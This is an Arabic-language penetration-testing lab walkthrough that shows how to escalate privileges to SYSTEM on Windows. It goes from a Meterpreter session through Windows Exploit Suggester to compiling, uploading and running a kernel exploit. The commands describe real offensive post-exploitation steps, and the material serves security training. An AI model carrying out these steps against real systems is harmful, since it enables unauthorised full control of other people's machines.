🧪 المختبر 7: رفع امتيازات Windows باستخدام Windows Exploit Suggester

🎯 الهدف الأساسي: رفع الامتيازات إلى NT AUTHORITY\SYSTEM على نظام Windows باستخدام استغلال ثغرة Kernel يتم تحديده بواسطة سكريبت Windows Exploit Suggester.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: ما بعد الاستغلال (التعداد المحلي، رفع الامتيازات)

  1. الحصول على الوصول الأولي والتعداد المحلي:

    • بعد الحصول على جلسة Meterpreter الأولية .

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      getuid
    • الشرح: إذا نفذت هذا الأمر، ستعرض لك الوحدة اسم المستخدم الحالي (مثلاً D7M).

    • الأمر:

      getpriv
    • الشرح بيعرض لك امتيازات المستخدم الحالي والتي من المتوقع أن تكون محدودة.

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      shell
    • الشرح:بتحصل على جلسة Command Prompt.

    • الأمر: (داخل جلسة Command Prompt)

      systeminfo
    • الشرح: بيعرض لك معلومات مفصلة حول نظام Windows، بما في ذلك إصدار نظام التشغيل، وبنية النظام، والإصلاحات العاجلة المثبتة (Hotfixes).

  2. تحديد استغلالات Kernel المحتملة باستخدام Windows Exploit Suggester:

    • حمل ملف أداة windows-exploit-suggester.py من قيت هب .

    • الأمر:

      python windows-exploit-suggester.py --update
    • الشرح:ستقوم الأداة بتنزيل أحدث قاعدة بيانات للثغرات الأمنية من Microsoft.

    • الأمر الأساسي:

      python windows-exploit-suggester.py --database <path_to_database.xlsx> --systeminfo <path_to_Windows7.txt>
    • الشرح: الأداة بتحلل معلومات النظام التي قمت بجمعها ومقارنتها بقاعدة البيانات لتحديد الاستغلالات المحلية المناسبة لرفع الامتيازات.

  3. الحصول على كود الاستغلال وتجميعه (Compile) وتنفيذه:

    • من القائمة التي اقترحتها الأداة، حدد استغلال مناسب استغلال يرفع الامتيازات لـ NT AUTHORITY\SYSTEM).

    • قم بتنزيل كود الاستغلال (إذا كان بصيغة C) من مصدر موثوق به (مثل Exploit-DB) إذا ودك او انسخه .

    • الأمر:

      gcc -pthread exploit.c -o exploit.exe
    • الشرح: سيتم تجميع الكود لإنشاء ملف تنفيذي.

    • قم بتحميل الملف التنفيذي المجمع للاستغلال إلى النظام المستهدف (عادة في مجلد مؤقت مثل C:\temp).

    • الأمر:

      upload /path/to/exploit.exe C:\\temp\\exploit.exe
    • تنفيذ الاستغلال على الهدف:

    • الأمر:

      shell
      cd C:\temp
      exploit.exe
    • الشرح: إذا نفذت هذا الأمر، سيبدأ الاستغلال في العمل.

Last updated